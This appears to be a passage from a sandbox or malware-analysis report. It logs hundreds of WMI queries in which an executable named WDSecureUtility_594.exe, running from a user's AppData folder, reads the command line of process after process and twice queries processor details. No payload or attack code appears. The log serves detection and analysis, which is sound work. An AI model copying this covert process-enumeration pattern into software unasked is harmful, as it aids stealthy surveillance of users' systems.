Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7324
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5876
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3596
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5164
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6456
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2576
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3436
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4728
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1800
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2140
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2568
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1704
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 408
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5572
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3844
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3412
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4852
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5996
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2544
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6852
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2108
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6848
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2588
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2532
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6092
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5976
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 372
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2092
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3384
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2520
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 364
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6828
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1224
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6824
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1648
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1216
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 784
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7048
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1212
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2072
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6812
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6580
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 776
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6808
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 772
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1200
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 324
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5100
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6348
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 744
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3736
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6040
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 736
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2028
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1596
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4612
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4608
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2020
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4600
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4168
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2012
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2872
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1572
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1140
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2428
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5012
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6732
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2420
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7160
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5424
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5432
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5860
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3704
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7300
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6128
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2924
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5852
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4984
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1100
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5856
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5836
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1092
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3676
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4968
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6896
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5496
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5392
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6248
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6240
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4084
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7100
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2788
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6372
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6216
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5800
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2780
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 624
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6452
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5124
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5356
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1476
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1044
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4916
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2328
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3620
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6200
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1888
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5764
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5328
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1448
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1876
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2304
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5320
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1008
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7040
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2728
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1000
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4016
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2720
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4436
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 556
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 984
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5344
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1412
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3564
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4856
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7560
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6388
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1404
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5708
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7000
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1392
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 960
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4404
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5264
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6556
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5692
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6552
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5256
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2668
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2236
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6544
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3956
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6972
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6968
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6104
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 492
